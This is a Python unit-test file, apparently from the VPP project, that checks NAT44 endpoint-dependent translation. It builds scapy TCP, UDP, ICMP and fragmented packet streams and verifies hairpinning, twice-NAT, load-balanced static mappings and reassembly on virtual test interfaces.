| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
4c112d3573edd3e6931e7a7da3b6813387209e40
| 152,561
|
py
|
Python
|
test/test_nat44_ed.py
|
akanouras/vpp
|
a55a9fc239b5e47487a9489aa5dba9d229502d7e
|
[
"Apache-2.0"
] | 751
|
2017-07-13T06:16:46.000Z
|
2022-03-30T09:14:35.000Z
|
test/test_nat44_ed.py
|
akanouras/vpp
|
a55a9fc239b5e47487a9489aa5dba9d229502d7e
|
[
"Apache-2.0"
] | 15
|
2018-03-19T15:20:07.000Z
|
2022-03-18T19:48:21.000Z
|
test/test_nat44_ed.py
|
akanouras/vpp
|
a55a9fc239b5e47487a9489aa5dba9d229502d7e
|
[
"Apache-2.0"
] | 479
|
2017-07-13T06:17:26.000Z
|
2022-03-31T18:20:43.000Z
|
#!/usr/bin/env python3
import unittest
from io import BytesIO
from random import randint, shuffle, choice
import scapy.compat
from framework import VppTestCase, VppTestRunner
from scapy.data import IP_PROTOS
from scapy.layers.inet import IP, TCP, UDP, ICMP, GRE
from scapy.layers.inet import IPerror, TCPerror
from scapy.layers.l2 import Ether
from scapy.packet import Raw
from syslog_rfc5424_parser import SyslogMessage, ParseError
from syslog_rfc5424_parser.constants import SyslogSeverity
from util import ppp, ip4_range
from vpp_acl import AclRule, VppAcl, VppAclInterface
from vpp_ip_route import VppIpRoute, VppRoutePath
from vpp_papi import VppEnum
class TestNAT44ED(VppTestCase):
""" NAT44ED Test Case """
nat_addr = '10.0.0.3'
tcp_port_in = 6303
tcp_port_out = 6303
udp_port_in = 6304
udp_port_out = 6304
icmp_id_in = 6305
icmp_id_out = 6305
tcp_external_port = 80
max_sessions = 100
def setUp(self):
super().setUp()
self.plugin_enable()
def tearDown(self):
super().tearDown()
if not self.vpp_dead:
self.plugin_disable()
def plugin_enable(self):
self.vapi.nat44_ed_plugin_enable_disable(
sessions=self.max_sessions, enable=1)
def plugin_disable(self):
self.vapi.nat44_ed_plugin_enable_disable(enable=0)
@property
def config_flags(self):
return VppEnum.vl_api_nat_config_flags_t
@property
def nat44_config_flags(self):
return VppEnum.vl_api_nat44_config_flags_t
@property
def syslog_severity(self):
return VppEnum.vl_api_syslog_severity_t
@property
def server_addr(self):
return self.pg1.remote_hosts[0].ip4
@staticmethod
def random_port():
return randint(1025, 65535)
@staticmethod
def proto2layer(proto):
if proto == IP_PROTOS.tcp:
return TCP
elif proto == IP_PROTOS.udp:
return UDP
elif proto == IP_PROTOS.icmp:
return ICMP
else:
raise Exception("Unsupported protocol")
@classmethod
def create_and_add_ip4_table(cls, i, table_id=0):
cls.vapi.ip_table_add_del(is_add=1, table={'table_id': table_id})
i.set_table_ip4(table_id)
    @classmethod
    def configure_ip4_interface(cls, i, hosts=0, table_id=None):
        """Bring up interface *i* with IPv4 config and resolved ARP.

        :param hosts: number of remote hosts to generate (0 = none)
        :param table_id: optional FIB table to create and bind first.
            NOTE(review): a falsy check is used, so an explicit
            table_id=0 is treated like None (no table created) —
            presumably fine since 0 is the default table; confirm.
        """
        if table_id:
            cls.create_and_add_ip4_table(i, table_id)
        i.admin_up()
        i.config_ip4()
        i.resolve_arp()
        if hosts:
            i.generate_remote_hosts(hosts)
            i.configure_ipv4_neighbors()
@classmethod
def nat_add_interface_address(cls, i):
cls.vapi.nat44_add_del_interface_addr(
sw_if_index=i.sw_if_index, is_add=1)
def nat_add_inside_interface(self, i):
self.vapi.nat44_interface_add_del_feature(
flags=self.config_flags.NAT_IS_INSIDE,
sw_if_index=i.sw_if_index, is_add=1)
def nat_add_outside_interface(self, i):
self.vapi.nat44_interface_add_del_feature(
flags=self.config_flags.NAT_IS_OUTSIDE,
sw_if_index=i.sw_if_index, is_add=1)
def nat_add_address(self, address, twice_nat=0,
vrf_id=0xFFFFFFFF, is_add=1):
flags = self.config_flags.NAT_IS_TWICE_NAT if twice_nat else 0
self.vapi.nat44_add_del_address_range(first_ip_address=address,
last_ip_address=address,
vrf_id=vrf_id,
is_add=is_add,
flags=flags)
def nat_add_static_mapping(self, local_ip, external_ip='0.0.0.0',
local_port=0, external_port=0, vrf_id=0,
is_add=1, external_sw_if_index=0xFFFFFFFF,
proto=0, tag="", flags=0):
if not (local_port and external_port):
flags |= self.config_flags.NAT_IS_ADDR_ONLY
self.vapi.nat44_add_del_static_mapping(
is_add=is_add,
local_ip_address=local_ip,
external_ip_address=external_ip,
external_sw_if_index=external_sw_if_index,
local_port=local_port,
external_port=external_port,
vrf_id=vrf_id, protocol=proto,
flags=flags,
tag=tag)
    @classmethod
    def setUpClass(cls):
        """One-time topology setup shared by all tests in the class.

        Creates 12 pg interfaces; pg0..pg3 get full IPv4 bring-up with
        three remote hosts each.  pg4/pg5/pg6 and extra FIB tables are
        prepared for specific tests (see inline comments).  Call order
        matters: tables are created before interfaces are bound to them,
        and ARP is resolved after addressing.
        """
        super().setUpClass()
        cls.create_pg_interfaces(range(12))
        cls.interfaces = list(cls.pg_interfaces[:4])
        # pg2 is moved into FIB table 10 before the common bring-up
        cls.create_and_add_ip4_table(cls.pg2, 10)
        for i in cls.interfaces:
            cls.configure_ip4_interface(i, hosts=3)
        # test specific (test-multiple-vrf)
        cls.vapi.ip_table_add_del(is_add=1, table={'table_id': 1})
        # test specific (test-one-armed-nat44-static)
        # pg4 carries an extra 10.0.0.1/24 address; both remote hosts
        # are aliased to one IP and ARP is re-resolved afterwards
        cls.pg4.generate_remote_hosts(2)
        cls.pg4.config_ip4()
        cls.vapi.sw_interface_add_del_address(
            sw_if_index=cls.pg4.sw_if_index,
            prefix="10.0.0.1/24")
        cls.pg4.admin_up()
        cls.pg4.resolve_arp()
        cls.pg4._remote_hosts[1]._ip4 = cls.pg4._remote_hosts[0]._ip4
        cls.pg4.resolve_arp()
        # test specific interface (pg5) - bound to FIB table 1
        cls.pg5._local_ip4 = "10.1.1.1"
        cls.pg5._remote_hosts[0]._ip4 = "10.1.1.2"
        cls.pg5.set_table_ip4(1)
        cls.pg5.config_ip4()
        cls.pg5.admin_up()
        cls.pg5.resolve_arp()
        # test specific interface (pg6) - bound to FIB table 1
        cls.pg6._local_ip4 = "10.1.2.1"
        cls.pg6._remote_hosts[0]._ip4 = "10.1.2.2"
        cls.pg6.set_table_ip4(1)
        cls.pg6.config_ip4()
        cls.pg6.admin_up()
        cls.pg6.resolve_arp()
        # static routes: default routes in tables 0 and 1, host routes
        # for pg5/pg6 in table 1, and a /16 steering route from table 0
        # into table 1
        rl = list()
        rl.append(VppIpRoute(cls, "0.0.0.0", 0,
                             [VppRoutePath("0.0.0.0", 0xffffffff,
                                           nh_table_id=0)],
                             register=False, table_id=1))
        rl.append(VppIpRoute(cls, "0.0.0.0", 0,
                             [VppRoutePath(cls.pg1.local_ip4,
                                           cls.pg1.sw_if_index)],
                             register=False))
        rl.append(VppIpRoute(cls, cls.pg5.remote_ip4, 32,
                             [VppRoutePath("0.0.0.0",
                                           cls.pg5.sw_if_index)],
                             register=False, table_id=1))
        rl.append(VppIpRoute(cls, cls.pg6.remote_ip4, 32,
                             [VppRoutePath("0.0.0.0",
                                           cls.pg6.sw_if_index)],
                             register=False, table_id=1))
        rl.append(VppIpRoute(cls, cls.pg6.remote_ip4, 16,
                             [VppRoutePath("0.0.0.0", 0xffffffff,
                                           nh_table_id=1)],
                             register=False, table_id=0))
        for r in rl:
            r.add_vpp_config()
def get_err_counter(self, path):
return self.statistics.get_err_counter(path)
    def reass_hairpinning(self, server_addr, server_in_port, server_out_port,
                          host_in_port, proto=IP_PROTOS.tcp,
                          ignore_port=False):
        """Hairpinning test with fragmented packets.

        A host on pg0 sends a fragmented request to the NAT address;
        the hairpinned fragments come back on pg0, are reassembled and
        checked for the server's inside port and intact payload.
        """
        layer = self.proto2layer(proto)
        if proto == IP_PROTOS.tcp:
            data = b"A" * 4 + b"B" * 16 + b"C" * 3
        else:
            data = b"A" * 16 + b"B" * 16 + b"C" * 3
        # send packet from host to server
        pkts = self.create_stream_frag(self.pg0,
                                       self.nat_addr,
                                       host_in_port,
                                       server_out_port,
                                       data,
                                       proto)
        self.pg0.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        frags = self.pg0.get_capture(len(pkts))
        p = self.reass_frags_and_verify(frags,
                                        self.nat_addr,
                                        server_addr)
        if proto != IP_PROTOS.icmp:
            if not ignore_port:
                self.assertNotEqual(p[layer].sport, host_in_port)
            self.assertEqual(p[layer].dport, server_in_port)
        else:
            if not ignore_port:
                self.assertNotEqual(p[layer].id, host_in_port)
        self.assertEqual(data, p[Raw].load)
    def frag_out_of_order(self, proto=IP_PROTOS.tcp, dont_translate=False,
                          ignore_port=False):
        """Fragment test: in2out then out2in, fragments sent reversed.

        Runs two iterations so the second pass exercises the session
        created by the first.  With *dont_translate* the packets are
        expected to pass through unchanged (forwarding mode).
        """
        layer = self.proto2layer(proto)
        if proto == IP_PROTOS.tcp:
            data = b"A" * 4 + b"B" * 16 + b"C" * 3
        else:
            data = b"A" * 16 + b"B" * 16 + b"C" * 3
        self.port_in = self.random_port()
        for i in range(2):
            # in2out
            pkts = self.create_stream_frag(self.pg0, self.pg1.remote_ip4,
                                           self.port_in, 20, data, proto)
            pkts.reverse()
            self.pg0.add_stream(pkts)
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            frags = self.pg1.get_capture(len(pkts))
            if not dont_translate:
                p = self.reass_frags_and_verify(frags,
                                                self.nat_addr,
                                                self.pg1.remote_ip4)
            else:
                p = self.reass_frags_and_verify(frags,
                                                self.pg0.remote_ip4,
                                                self.pg1.remote_ip4)
            if proto != IP_PROTOS.icmp:
                if not dont_translate:
                    self.assertEqual(p[layer].dport, 20)
                    if not ignore_port:
                        self.assertNotEqual(p[layer].sport, self.port_in)
                else:
                    self.assertEqual(p[layer].sport, self.port_in)
            else:
                if not ignore_port:
                    if not dont_translate:
                        self.assertNotEqual(p[layer].id, self.port_in)
                    else:
                        self.assertEqual(p[layer].id, self.port_in)
            self.assertEqual(data, p[Raw].load)
            # out2in
            if not dont_translate:
                dst_addr = self.nat_addr
            else:
                dst_addr = self.pg0.remote_ip4
            if proto != IP_PROTOS.icmp:
                sport = 20
                dport = p[layer].sport
            else:
                sport = p[layer].id
                dport = 0
            pkts = self.create_stream_frag(self.pg1, dst_addr, sport, dport,
                                           data, proto, echo_reply=True)
            pkts.reverse()
            self.pg1.add_stream(pkts)
            self.pg_enable_capture(self.pg_interfaces)
            # NOTE(review): trace is dumped before pg_start(), so this
            # logs the previous run's trace — confirm intended
            self.logger.info(self.vapi.cli("show trace"))
            self.pg_start()
            frags = self.pg0.get_capture(len(pkts))
            p = self.reass_frags_and_verify(frags,
                                            self.pg1.remote_ip4,
                                            self.pg0.remote_ip4)
            if proto != IP_PROTOS.icmp:
                self.assertEqual(p[layer].sport, 20)
                self.assertEqual(p[layer].dport, self.port_in)
            else:
                self.assertEqual(p[layer].id, self.port_in)
            self.assertEqual(data, p[Raw].load)
    def reass_frags_and_verify(self, frags, src, dst):
        """Reassemble *frags* into one packet, verifying src/dst/checksums.

        Each fragment's payload is written into a buffer at its fragment
        offset (the IP ``frag`` field counts 8-byte units), then one
        TCP/UDP/ICMP packet is rebuilt from the buffer.
        NOTE(review): for a protocol other than TCP/UDP/ICMP, ``p`` is
        never bound and the final ``return p`` would raise
        UnboundLocalError — callers only pass those three protocols.
        """
        buffer = BytesIO()
        for p in frags:
            self.assertEqual(p[IP].src, src)
            self.assertEqual(p[IP].dst, dst)
            self.assert_ip_checksum_valid(p)
            buffer.seek(p[IP].frag * 8)
            buffer.write(bytes(p[IP].payload))
        ip = IP(src=frags[0][IP].src, dst=frags[0][IP].dst,
                proto=frags[0][IP].proto)
        if ip.proto == IP_PROTOS.tcp:
            p = (ip / TCP(buffer.getvalue()))
            self.logger.debug(ppp("Reassembled:", p))
            self.assert_tcp_checksum_valid(p)
        elif ip.proto == IP_PROTOS.udp:
            # keep only the 8-byte UDP header; the rest is raw payload
            p = (ip / UDP(buffer.getvalue()[:8]) /
                 Raw(buffer.getvalue()[8:]))
        elif ip.proto == IP_PROTOS.icmp:
            p = (ip / ICMP(buffer.getvalue()))
        return p
    def frag_in_order(self, proto=IP_PROTOS.tcp, dont_translate=False,
                      ignore_port=False):
        """Fragment test: in2out then out2in, fragments sent in order.

        With *dont_translate* the packets are expected to pass through
        unchanged (forwarding mode).
        """
        layer = self.proto2layer(proto)
        if proto == IP_PROTOS.tcp:
            data = b"A" * 4 + b"B" * 16 + b"C" * 3
        else:
            data = b"A" * 16 + b"B" * 16 + b"C" * 3
        self.port_in = self.random_port()
        # in2out
        pkts = self.create_stream_frag(self.pg0, self.pg1.remote_ip4,
                                       self.port_in, 20, data, proto)
        self.pg0.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        frags = self.pg1.get_capture(len(pkts))
        if not dont_translate:
            p = self.reass_frags_and_verify(frags,
                                            self.nat_addr,
                                            self.pg1.remote_ip4)
        else:
            p = self.reass_frags_and_verify(frags,
                                            self.pg0.remote_ip4,
                                            self.pg1.remote_ip4)
        if proto != IP_PROTOS.icmp:
            if not dont_translate:
                self.assertEqual(p[layer].dport, 20)
                if not ignore_port:
                    self.assertNotEqual(p[layer].sport, self.port_in)
            else:
                self.assertEqual(p[layer].sport, self.port_in)
        else:
            if not ignore_port:
                if not dont_translate:
                    self.assertNotEqual(p[layer].id, self.port_in)
                else:
                    self.assertEqual(p[layer].id, self.port_in)
        self.assertEqual(data, p[Raw].load)
        # out2in
        if not dont_translate:
            dst_addr = self.nat_addr
        else:
            dst_addr = self.pg0.remote_ip4
        if proto != IP_PROTOS.icmp:
            sport = 20
            dport = p[layer].sport
        else:
            sport = p[layer].id
            dport = 0
        pkts = self.create_stream_frag(self.pg1, dst_addr, sport, dport, data,
                                       proto, echo_reply=True)
        self.pg1.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        frags = self.pg0.get_capture(len(pkts))
        p = self.reass_frags_and_verify(frags,
                                        self.pg1.remote_ip4,
                                        self.pg0.remote_ip4)
        if proto != IP_PROTOS.icmp:
            self.assertEqual(p[layer].sport, 20)
            self.assertEqual(p[layer].dport, self.port_in)
        else:
            self.assertEqual(p[layer].id, self.port_in)
        self.assertEqual(data, p[Raw].load)
def verify_capture_out(self, capture, nat_ip=None, same_port=False,
dst_ip=None, ignore_port=False):
if nat_ip is None:
nat_ip = self.nat_addr
for packet in capture:
try:
self.assert_packet_checksums_valid(packet)
self.assertEqual(packet[IP].src, nat_ip)
if dst_ip is not None:
self.assertEqual(packet[IP].dst, dst_ip)
if packet.haslayer(TCP):
if not ignore_port:
if same_port:
self.assertEqual(
packet[TCP].sport, self.tcp_port_in)
else:
self.assertNotEqual(
packet[TCP].sport, self.tcp_port_in)
self.tcp_port_out = packet[TCP].sport
self.assert_packet_checksums_valid(packet)
elif packet.haslayer(UDP):
if not ignore_port:
if same_port:
self.assertEqual(
packet[UDP].sport, self.udp_port_in)
else:
self.assertNotEqual(
packet[UDP].sport, self.udp_port_in)
self.udp_port_out = packet[UDP].sport
else:
if not ignore_port:
if same_port:
self.assertEqual(
packet[ICMP].id, self.icmp_id_in)
else:
self.assertNotEqual(
packet[ICMP].id, self.icmp_id_in)
self.icmp_id_out = packet[ICMP].id
self.assert_packet_checksums_valid(packet)
except:
self.logger.error(ppp("Unexpected or invalid packet "
"(outside network):", packet))
raise
def verify_capture_in(self, capture, in_if):
for packet in capture:
try:
self.assert_packet_checksums_valid(packet)
self.assertEqual(packet[IP].dst, in_if.remote_ip4)
if packet.haslayer(TCP):
self.assertEqual(packet[TCP].dport, self.tcp_port_in)
elif packet.haslayer(UDP):
self.assertEqual(packet[UDP].dport, self.udp_port_in)
else:
self.assertEqual(packet[ICMP].id, self.icmp_id_in)
except:
self.logger.error(ppp("Unexpected or invalid packet "
"(inside network):", packet))
raise
def create_stream_in(self, in_if, out_if, dst_ip=None, ttl=64):
if dst_ip is None:
dst_ip = out_if.remote_ip4
pkts = []
# TCP
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=dst_ip, ttl=ttl) /
TCP(sport=self.tcp_port_in, dport=20))
pkts.extend([p, p])
# UDP
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=dst_ip, ttl=ttl) /
UDP(sport=self.udp_port_in, dport=20))
pkts.append(p)
# ICMP
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=dst_ip, ttl=ttl) /
ICMP(id=self.icmp_id_in, type='echo-request'))
pkts.append(p)
return pkts
def create_stream_out(self, out_if, dst_ip=None, ttl=64,
use_inside_ports=False):
if dst_ip is None:
dst_ip = self.nat_addr
if not use_inside_ports:
tcp_port = self.tcp_port_out
udp_port = self.udp_port_out
icmp_id = self.icmp_id_out
else:
tcp_port = self.tcp_port_in
udp_port = self.udp_port_in
icmp_id = self.icmp_id_in
pkts = []
# TCP
p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) /
IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) /
TCP(dport=tcp_port, sport=20))
pkts.extend([p, p])
# UDP
p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) /
IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) /
UDP(dport=udp_port, sport=20))
pkts.append(p)
# ICMP
p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) /
IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) /
ICMP(id=icmp_id, type='echo-reply'))
pkts.append(p)
return pkts
def create_tcp_stream(self, in_if, out_if, count):
pkts = []
port = 6303
for i in range(count):
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=out_if.remote_ip4, ttl=64) /
TCP(sport=port + i, dport=20))
pkts.append(p)
return pkts
def create_stream_frag(self, src_if, dst, sport, dport, data,
proto=IP_PROTOS.tcp, echo_reply=False):
if proto == IP_PROTOS.tcp:
p = (IP(src=src_if.remote_ip4, dst=dst) /
TCP(sport=sport, dport=dport) /
Raw(data))
p = p.__class__(scapy.compat.raw(p))
chksum = p[TCP].chksum
proto_header = TCP(sport=sport, dport=dport, chksum=chksum)
elif proto == IP_PROTOS.udp:
proto_header = UDP(sport=sport, dport=dport)
elif proto == IP_PROTOS.icmp:
if not echo_reply:
proto_header = ICMP(id=sport, type='echo-request')
else:
proto_header = ICMP(id=sport, type='echo-reply')
else:
raise Exception("Unsupported protocol")
id = self.random_port()
pkts = []
if proto == IP_PROTOS.tcp:
raw = Raw(data[0:4])
else:
raw = Raw(data[0:16])
p = (Ether(src=src_if.remote_mac, dst=src_if.local_mac) /
IP(src=src_if.remote_ip4, dst=dst, flags="MF", frag=0, id=id) /
proto_header /
raw)
pkts.append(p)
if proto == IP_PROTOS.tcp:
raw = Raw(data[4:20])
else:
raw = Raw(data[16:32])
p = (Ether(src=src_if.remote_mac, dst=src_if.local_mac) /
IP(src=src_if.remote_ip4, dst=dst, flags="MF", frag=3, id=id,
proto=proto) /
raw)
pkts.append(p)
if proto == IP_PROTOS.tcp:
raw = Raw(data[20:])
else:
raw = Raw(data[32:])
p = (Ether(src=src_if.remote_mac, dst=src_if.local_mac) /
IP(src=src_if.remote_ip4, dst=dst, frag=5, proto=proto,
id=id) /
raw)
pkts.append(p)
return pkts
    def frag_in_order_in_plus_out(self, in_addr, out_addr, in_port, out_port,
                                  proto=IP_PROTOS.tcp):
        """Static-mapping fragment test, fragments sent in order.

        out2in first (external host on pg0 to mapped service behind
        pg1), then the in2out reply.  Two iterations so the second pass
        uses the established session.
        """
        layer = self.proto2layer(proto)
        if proto == IP_PROTOS.tcp:
            data = b"A" * 4 + b"B" * 16 + b"C" * 3
        else:
            data = b"A" * 16 + b"B" * 16 + b"C" * 3
        port_in = self.random_port()
        for i in range(2):
            # out2in
            pkts = self.create_stream_frag(self.pg0, out_addr,
                                           port_in, out_port,
                                           data, proto)
            self.pg0.add_stream(pkts)
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            frags = self.pg1.get_capture(len(pkts))
            p = self.reass_frags_and_verify(frags,
                                            self.pg0.remote_ip4,
                                            in_addr)
            if proto != IP_PROTOS.icmp:
                self.assertEqual(p[layer].sport, port_in)
                self.assertEqual(p[layer].dport, in_port)
            else:
                self.assertEqual(p[layer].id, port_in)
            self.assertEqual(data, p[Raw].load)
            # in2out
            if proto != IP_PROTOS.icmp:
                pkts = self.create_stream_frag(self.pg1, self.pg0.remote_ip4,
                                               in_port,
                                               p[layer].sport, data, proto)
            else:
                pkts = self.create_stream_frag(self.pg1, self.pg0.remote_ip4,
                                               p[layer].id, 0, data, proto,
                                               echo_reply=True)
            self.pg1.add_stream(pkts)
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            frags = self.pg0.get_capture(len(pkts))
            p = self.reass_frags_and_verify(frags,
                                            out_addr,
                                            self.pg0.remote_ip4)
            if proto != IP_PROTOS.icmp:
                self.assertEqual(p[layer].sport, out_port)
                self.assertEqual(p[layer].dport, port_in)
            else:
                self.assertEqual(p[layer].id, port_in)
            self.assertEqual(data, p[Raw].load)
def frag_out_of_order_in_plus_out(self, in_addr, out_addr, in_port,
out_port, proto=IP_PROTOS.tcp):
layer = self.proto2layer(proto)
if proto == IP_PROTOS.tcp:
data = b"A" * 4 + b"B" * 16 + b"C" * 3
else:
data = b"A" * 16 + b"B" * 16 + b"C" * 3
port_in = self.random_port()
for i in range(2):
# out2in
pkts = self.create_stream_frag(self.pg0, out_addr,
port_in, out_port,
data, proto)
pkts.reverse()
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
frags = self.pg1.get_capture(len(pkts))
p = self.reass_frags_and_verify(frags,
self.pg0.remote_ip4,
in_addr)
if proto != IP_PROTOS.icmp:
self.assertEqual(p[layer].dport, in_port)
self.assertEqual(p[layer].sport, port_in)
self.assertEqual(p[layer].dport, in_port)
else:
self.assertEqual(p[layer].id, port_in)
self.assertEqual(data, p[Raw].load)
# in2out
if proto != IP_PROTOS.icmp:
pkts = self.create_stream_frag(self.pg1, self.pg0.remote_ip4,
in_port,
p[layer].sport, data, proto)
else:
pkts = self.create_stream_frag(self.pg1, self.pg0.remote_ip4,
p[layer].id, 0, data, proto,
echo_reply=True)
pkts.reverse()
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
frags = self.pg0.get_capture(len(pkts))
p = self.reass_frags_and_verify(frags,
out_addr,
self.pg0.remote_ip4)
if proto != IP_PROTOS.icmp:
self.assertEqual(p[layer].sport, out_port)
self.assertEqual(p[layer].dport, port_in)
else:
self.assertEqual(p[layer].id, port_in)
self.assertEqual(data, p[Raw].load)
    def init_tcp_session(self, in_if, out_if, in_port, ext_port):
        """Establish a TCP session through the NAT (3-way handshake).

        Sends SYN in->out, SYN+ACK out->in, ACK in->out.

        :returns: the outside (translated) source port learned from the
            SYN captured on *out_if*
        """
        # SYN packet in->out
        p = (Ether(src=in_if.remote_mac, dst=in_if.local_mac) /
             IP(src=in_if.remote_ip4, dst=out_if.remote_ip4) /
             TCP(sport=in_port, dport=ext_port, flags="S"))
        in_if.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = out_if.get_capture(1)
        p = capture[0]
        out_port = p[TCP].sport
        # SYN + ACK packet out->in
        p = (Ether(src=out_if.remote_mac, dst=out_if.local_mac) /
             IP(src=out_if.remote_ip4, dst=self.nat_addr) /
             TCP(sport=ext_port, dport=out_port, flags="SA"))
        out_if.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        in_if.get_capture(1)
        # ACK packet in->out
        p = (Ether(src=in_if.remote_mac, dst=in_if.local_mac) /
             IP(src=in_if.remote_ip4, dst=out_if.remote_ip4) /
             TCP(sport=in_port, dport=ext_port, flags="A"))
        in_if.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        out_if.get_capture(1)
        return out_port
    def twice_nat_common(self, self_twice_nat=False, same_pg=False, lb=False,
                         client_id=None):
        """Common body for the twice-NAT / self-twice-NAT test variants.

        Configures a (possibly load-balanced) static mapping with a
        twice-NAT flag, sends one TCP packet from the client to the
        mapped service, verifies both translation directions, then
        checks and deletes the created session via the session dump API.

        :param self_twice_nat: use NAT_IS_SELF_TWICE_NAT instead of
            NAT_IS_TWICE_NAT
        :param same_pg: client and server are both behind pg0
        :param lb: use a load-balanced mapping with two local backends
        :param client_id: which pg0 remote host is the client
            (required when lb and same_pg)
        """
        twice_nat_addr = '10.0.1.3'
        port_in = 8080
        if lb:
            if not same_pg:
                port_in1 = port_in
                port_in2 = port_in
            else:
                # same pg: distinct inside ports so the two backends
                # are distinguishable
                port_in1 = port_in + 1
                port_in2 = port_in + 2
        port_out = 80
        eh_port_out = 4567
        server1 = self.pg0.remote_hosts[0]
        server2 = self.pg0.remote_hosts[1]
        if lb and same_pg:
            server2 = server1
        if not lb:
            server = server1
        pg0 = self.pg0
        if same_pg:
            pg1 = self.pg0
        else:
            pg1 = self.pg1
        # whether the external host address/port are expected to be
        # translated in the in2out direction
        eh_translate = ((not self_twice_nat) or (not lb and same_pg) or
                        client_id == 1)
        self.nat_add_address(self.nat_addr)
        self.nat_add_address(twice_nat_addr, twice_nat=1)
        flags = 0
        if self_twice_nat:
            flags |= self.config_flags.NAT_IS_SELF_TWICE_NAT
        else:
            flags |= self.config_flags.NAT_IS_TWICE_NAT
        if not lb:
            self.nat_add_static_mapping(pg0.remote_ip4, self.nat_addr,
                                        port_in, port_out,
                                        proto=IP_PROTOS.tcp,
                                        flags=flags)
        else:
            locals = [{'addr': server1.ip4,
                       'port': port_in1,
                       'probability': 50,
                       'vrf_id': 0},
                      {'addr': server2.ip4,
                       'port': port_in2,
                       'probability': 50,
                       'vrf_id': 0}]
            out_addr = self.nat_addr
            self.vapi.nat44_add_del_lb_static_mapping(is_add=1, flags=flags,
                                                      external_addr=out_addr,
                                                      external_port=port_out,
                                                      protocol=IP_PROTOS.tcp,
                                                      local_num=len(locals),
                                                      locals=locals)
        self.nat_add_inside_interface(pg0)
        self.nat_add_outside_interface(pg1)
        # pick the client host
        if same_pg:
            if not lb:
                client = server
            else:
                assert client_id is not None
                if client_id == 1:
                    client = self.pg0.remote_hosts[0]
                elif client_id == 2:
                    client = self.pg0.remote_hosts[1]
        else:
            client = pg1.remote_hosts[0]
        # out2in: client -> NAT address
        p = (Ether(src=pg1.remote_mac, dst=pg1.local_mac) /
             IP(src=client.ip4, dst=self.nat_addr) /
             TCP(sport=eh_port_out, dport=port_out))
        pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = pg0.get_capture(1)
        p = capture[0]
        try:
            ip = p[IP]
            tcp = p[TCP]
            if lb:
                # learn which backend the LB selected
                if ip.dst == server1.ip4:
                    server = server1
                    port_in = port_in1
                else:
                    server = server2
                    port_in = port_in2
            self.assertEqual(ip.dst, server.ip4)
            if lb and same_pg:
                self.assertIn(tcp.dport, [port_in1, port_in2])
            else:
                self.assertEqual(tcp.dport, port_in)
            if eh_translate:
                self.assertEqual(ip.src, twice_nat_addr)
                self.assertNotEqual(tcp.sport, eh_port_out)
            else:
                self.assertEqual(ip.src, client.ip4)
                self.assertEqual(tcp.sport, eh_port_out)
            # remember the (possibly translated) external-host
            # address/port for the reply direction
            eh_addr_in = ip.src
            eh_port_in = tcp.sport
            saved_port_in = tcp.dport
            self.assert_packet_checksums_valid(p)
        except:
            self.logger.error(ppp("Unexpected or invalid packet:", p))
            raise
        # in2out: server reply back to the external host
        p = (Ether(src=server.mac, dst=pg0.local_mac) /
             IP(src=server.ip4, dst=eh_addr_in) /
             TCP(sport=saved_port_in, dport=eh_port_in))
        pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = pg1.get_capture(1)
        p = capture[0]
        try:
            ip = p[IP]
            tcp = p[TCP]
            self.assertEqual(ip.dst, client.ip4)
            self.assertEqual(ip.src, self.nat_addr)
            self.assertEqual(tcp.dport, eh_port_out)
            self.assertEqual(tcp.sport, port_out)
            self.assert_packet_checksums_valid(p)
        except:
            self.logger.error(ppp("Unexpected or invalid packet:", p))
            raise
        if eh_translate:
            # verify session flags, then tear the session down explicitly
            sessions = self.vapi.nat44_user_session_dump(server.ip4, 0)
            self.assertEqual(len(sessions), 1)
            self.assertTrue(sessions[0].flags &
                            self.config_flags.NAT_IS_EXT_HOST_VALID)
            self.assertTrue(sessions[0].flags &
                            self.config_flags.NAT_IS_TWICE_NAT)
            self.logger.info(self.vapi.cli("show nat44 sessions"))
            self.vapi.nat44_del_session(
                address=sessions[0].inside_ip_address,
                port=sessions[0].inside_port,
                protocol=sessions[0].protocol,
                flags=(self.config_flags.NAT_IS_INSIDE |
                       self.config_flags.NAT_IS_EXT_HOST_VALID),
                ext_host_address=sessions[0].ext_host_nat_address,
                ext_host_port=sessions[0].ext_host_nat_port)
            sessions = self.vapi.nat44_user_session_dump(server.ip4, 0)
            self.assertEqual(len(sessions), 0)
    def verify_syslog_sess(self, data, is_add=True, is_ip6=False):
        """Verify a NAT session syslog message (RFC 5424).

        Parses *data* and checks severity, appname, SADD/SDEL msgid and
        the 'nsess' structured-data parameters against the test's
        inside/outside addresses and ports.

